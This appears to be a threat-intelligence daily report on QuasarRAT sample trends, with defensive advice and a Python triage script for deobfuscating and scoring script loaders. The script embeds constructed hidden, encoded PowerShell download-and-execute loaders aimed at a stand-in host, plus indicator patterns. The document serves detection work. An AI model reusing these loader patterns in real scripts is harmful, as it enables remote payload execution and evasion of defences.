Daily Summary
QuasarRAT sample submissions reached 15 today, 44% above the 7-day average of roughly 10. This is a notable surge after several days of steady activity and suggests renewed operational tempo by the actors distributing the RAT. No new C2 servers were observed, but 15 new IOCs were logged.
New Samples Detected
The 15 new samples show a clear shift in packaging. Executables (.exe) account for 6 samples (40%), alongside 4 PowerShell scripts (.ps1), 3 batch files (.bat) and 2 MSI installers (.msi). The increased share of script-based loaders (.ps1 and .bat) relative to the week's average indicates an evolving delivery mechanism, most likely aimed at bypassing static signature detection. Naming remains generic: files are typically labelled 'update_installer' or 'invoice_pdf', and no unusual extensions were observed.
Distribution Methods
Today's distribution mix points to a multi-vector approach. The .exe and .msi samples are consistent with direct download links or malicious attachments in phishing emails, while the .ps1 and .bat files are more likely second-stage components of staged attacks: initial access via Office macros or LNK files, after which the script retrieves and runs the final payload. This matches recent campaigns in which QuasarRAT was delivered through HTML smuggling or hijacked email threads.
Detection Rate
Major engines, including Windows Defender, CrowdStrike and SentinelOne, detect the .exe variants well, with detection rates of around 85-90% in VirusTotal checks. The .ps1 and .bat samples fare worse, averaging 60-70%, which suggests the script-based loaders receive less heuristic coverage and may slip past first-pass filters. New variants incorporate simple obfuscation, such as base64-encoded commands and variable substitution, to lower detection further. One caveat when reading these figures: VirusTotal reports the vendors' static engines, not the behavioural detection of their endpoint agents, so a low VirusTotal rate for a script overstates how easily it runs unnoticed once it executes.
C2 Infrastructure
No new C2 servers were identified today. All command-and-control IPs belong to previously mapped infrastructure, with no geographic shift. The absence of new C2 domains suggests continued use of existing servers, or reliance on dynamic DNS services, which let the operators move hosts without registering new names.
7-Day Trend
Today's 44% spike above the 7-day average breaks the plateau of 8-11 daily submissions seen earlier this week. The uptick may indicate a new campaign launch or retooling by a threat group; either way, activity is ramping up.
Security Analysis
The heavy reliance on script-based droppers (.ps1 and .bat) rather than direct .exe delivery suggests the actors are prioritising evasion of email attachment filters over endpoint detection: script files commonly pass gateway policies that strip executables, and their content is cheap to re-obfuscate. This contrasts with late 2025 QuasarRAT campaigns, where executable payloads were more common. Actionable defence: enable PowerShell script block logging (Microsoft-Windows-PowerShell/Operational, Event ID 4104) so that every stage, including the decoded content of base64 -EncodedCommand loaders, is recorded as it executes, and restrict which scripts may run in user contexts. Note that the execution policy alone does not provide that restriction; it is a safety feature rather than a security boundary and is overridden per process with -ExecutionPolicy Bypass or by piping script text into powershell.exe. Blocking unsigned scripts for standard users requires an application-control layer such as AppLocker or WDAC, which also places PowerShell in Constrained Language Mode; deploying it in audit mode first keeps legitimate workflows from breaking.
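As an added example (not part of the original report and not built from any QuasarRAT sample), the following Python triage script ties together the Detection Rate and Security Analysis sections: it unwraps the simple obfuscation described for the .ps1/.bat loaders (UTF-16LE base64 -EncodedCommand payloads and concatenated string fragments) and scores the result against download-and-execute indicators, then applies the same scoring to Event ID 4104 script block records, reassembling blocks that PowerShell split across several events by ScriptBlockId. The sample loaders, the example.invalid URLs, the ScriptBlockId GUID, the indicator weights and the verdict threshold are all constructed for this example.

```python
"""Triage of obfuscated QuasarRAT-style script loaders and of PowerShell 4104
script block events. Added example with constructed inputs; not report data."""
import base64
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# (name, regex over the lower-cased deobfuscated text, weight). Weights and the
# verdict threshold in score_loader are illustrative choices for this example.
INDICATORS: list[tuple[str, str, int]] = [
    ("invoke-expression", r"\biex\b|invoke-expression", 3),
    ("download-cradle", r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|start-bitstransfer", 3),
    ("encoded-command", r"(?<!\w)-(?:e|ec|enc|encodedcommand)\b", 2),
    ("base64-decode", r"frombase64string", 2),
    ("hidden-window", r"(?<!\w)-(?:w|win|windowstyle)\s+hidden", 1),
    ("no-profile", r"(?<!\w)-(?:nop|noprofile)\b", 1),
    ("policy-bypass", r"(?<!\w)-(?:ep|exec|executionpolicy)\s+bypass", 2),
    ("webclient", r"new-object\s+(?:system\.)?(?:net\.)?webclient", 2),
    ("defender-tamper", r"(?:set|add)-mppreference", 2),
]
_CONCAT = re.compile(r"(['\"])([^'\"]*)\1\s*\+\s*(['\"])([^'\"]*)\3")  # 'Invoke-Exp'+'ression'
_B64 = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")                        # base64 runs long enough for a command
_NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"       # Windows event XML namespace


def _join_concats(text: str) -> str:
    """Collapse concatenated string literals until no '+' joins remain."""
    while True:
        text, n = _CONCAT.subn(lambda m: f"{m.group(1)}{m.group(2)}{m.group(4)}{m.group(1)}", text)
        if n == 0:
            return text


def _looks_like_text(s: str) -> bool:
    # Printable ASCII only: a wrong-encoding decode of real text yields CJK or NULs.
    return bool(s) and all(ord(c) < 128 and (c.isprintable() or c in "\r\n\t") for c in s)


def _decode_b64_blobs(text: str) -> list[str]:
    """Decode long base64 runs that yield readable text. -EncodedCommand payloads
    are UTF-16LE, so that encoding is tried before UTF-8."""
    out = []
    for blob in _B64.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        except ValueError:  # binascii.Error: not base64 after all
            continue
        for enc in ("utf-16-le", "utf-8"):
            try:
                cand = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if _looks_like_text(cand):
                out.append(cand)
                break
    return out


def deobfuscate(text: str, max_depth: int = 4) -> list[str]:
    """Return the normalised input followed by every decoded layer beneath it."""
    layers, queue, depth = [], [text], 0
    while queue and depth < max_depth:
        nxt = []
        for t in queue:
            t = _join_concats(t)
            layers.append(t)
            nxt.extend(_decode_b64_blobs(t))  # nested base64 is handled next round
        queue, depth = nxt, depth + 1
    return layers


def score_loader(text: str) -> dict[str, object]:
    """Score a .ps1/.bat body (or a logged script block) against INDICATORS."""
    joined = "\n".join(deobfuscate(text)).lower()
    hits = [name for name, rx, _ in INDICATORS if re.search(rx, joined)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"score": score, "indicators": hits, "layers": len(deobfuscate(text)),
            "verdict": "suspicious" if score >= 5 else "benign"}


def script_block_from_4104(events_xml: list[str]) -> dict[str, str]:
    """Reassemble ScriptBlockText per ScriptBlockId from 4104 event XML (the shape
    `wevtutil qe Microsoft-Windows-PowerShell/Operational /f:xml` renders). Blocks
    over the size limit arrive as several events ordered by MessageNumber."""
    parts: dict[str, list[tuple[int, str]]] = {}
    for xml in events_xml:
        root = ET.fromstring(xml)
        if root.findtext(f"{_NS}System/{_NS}EventID") != "4104":
            continue
        data = {d.get("Name"): (d.text or "") for d in root.iter(f"{_NS}Data")}
        parts.setdefault(data["ScriptBlockId"], []).append((int(data["MessageNumber"]), data["ScriptBlockText"]))
    return {sbid: "".join(t for _, t in sorted(frags)) for sbid, frags in parts.items()}


# --- constructed sample inputs (not real submissions) ---------------------------------
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/update_installer.txt')"
ENC = base64.b64encode(STAGE2.encode("utf-16-le")).decode()  # exactly what -EncodedCommand expects
SAMPLE_BAT = f"@echo off\r\nset p=powershell\r\n%p% -nop -w hidden -ep bypass -enc {ENC}\r\n"
SAMPLE_PS1 = ("$a='Invoke-Exp'+'ression'\n$u='http://example.invalid/invoice_pdf.txt'\n"
              "& $a ((New-Object Net.WebClient).('Down'+'loadString')($u))\n")
BENIGN_PS1 = "Get-ChildItem -Path C:\\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB }\n"


def _event_4104(sbid: str, num: int, total: int, text: str) -> str:
    """Constructed 4104 event in the wevtutil XML shape, namespace included."""
    return (f'<Event xmlns="{_NS[1:-1]}"><System><EventID>4104</EventID></System><EventData>'
            f'<Data Name="MessageNumber">{num}</Data><Data Name="MessageTotal">{total}</Data>'
            f'<Data Name="ScriptBlockText">{escape(text)}</Data>'
            f'<Data Name="ScriptBlockId">{sbid}</Data><Data Name="Path"></Data></EventData></Event>')


SBID = "7c1d5d6e-0000-4000-8000-000000004104"  # constructed GUID
EVENTS_4104 = [_event_4104(SBID, 2, 2, STAGE2[40:]),  # fragments may arrive out of order
               _event_4104(SBID, 1, 2, STAGE2[:40])]

if __name__ == "__main__":
    for label, body in (("bat loader", SAMPLE_BAT), ("ps1 loader", SAMPLE_PS1), ("benign", BENIGN_PS1)):
        print(label, score_loader(body))
    for sbid, block in script_block_from_4104(EVENTS_4104).items():
        print("4104", sbid, score_loader(block))
```

When the constructed .bat runs, PowerShell decodes the -EncodedCommand argument and logs the resulting script block, so the 4104 record carries the stage-2 command in clear text and the base64 layer no longer matters; that is why script block logging pays off regardless of how the loader was packaged. Treat the indicator list and weights as a starting point to tune against your own corpus, not as a signature set.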